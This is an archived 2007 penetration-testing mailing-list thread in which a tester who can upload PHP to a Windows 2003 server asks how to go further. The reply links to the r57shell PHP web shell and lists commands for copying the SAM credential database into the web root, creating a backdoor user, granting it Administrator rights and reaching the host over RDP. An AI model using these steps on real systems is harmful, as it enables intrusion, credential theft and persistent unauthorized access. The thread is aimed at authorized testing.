Penetration Testing: Re: PHP Exploitation

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Penetration Testing mailing list archives

Re: PHP Exploitation

From: "DokFLeed" <dokfleed () dokfleed net>
Date: Sun, 25 Nov 2007 11:12:24 +0400

I assume its for the good cause, and you are authorized to do so  ?!

Upload this to the server
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt

Try the following commands:
=====================
1) To see whats running on system
   tasklist -SVC
2) To get a copy of the sam database
   copy C:\windows\repair\sam C:\www\sam.txt
   http://hostname/sam.txt
3) To add new user with username tested123 & password tested123

net user tested123 tested123 /add /active:yes /expires:never/passwordchg:yes /passwordreq:yes

4) To make him Administrator
   net localgroup Administrators tested123 /add
5) Try to RDP to the server , if it is Firewalled!!

Download the RDP web front "Remote Desktop Connection Web ConnectionSoftware (455 KB)"

Start IIS http://hostname /TSweb/
and log to Localhost

remember while testing, your imagination is your limitation:),

depending on your phpinfo output none of this might work, so you will haveto code around it


Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble

==================

----- Original Message -----From: "Danux" <danuxx () gmail com>

To: <pen-test () securityfocus com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation

Hi experts, i need your ideas,

By now, i am able to upload php files to a Windows 2003 Server, so i
can execute php code like phpinfo, but i cant execute passthru command
because of lack of IUSR_MACHINE privileges.
I have run some local php bof's without success.

Do you have another idea to break into the server through php codeuploaded?


Cheers!!!!!

--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------



------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

By Date By Thread

Current thread:

PHP Exploitation Danux (Nov 24)
- Re: PHP Exploitation DokFLeed (Nov 25)
  - Re: PHP Exploitation Danux (Nov 27)
- Re: PHP Exploitation Kish Pent (Nov 25)
- Re: PHP Exploitation Robin Wood (Nov 27)
  - Re: PHP Exploitation Danux (Nov 27)
    - Message not available
    - Re: PHP Exploitation Danux (Nov 29)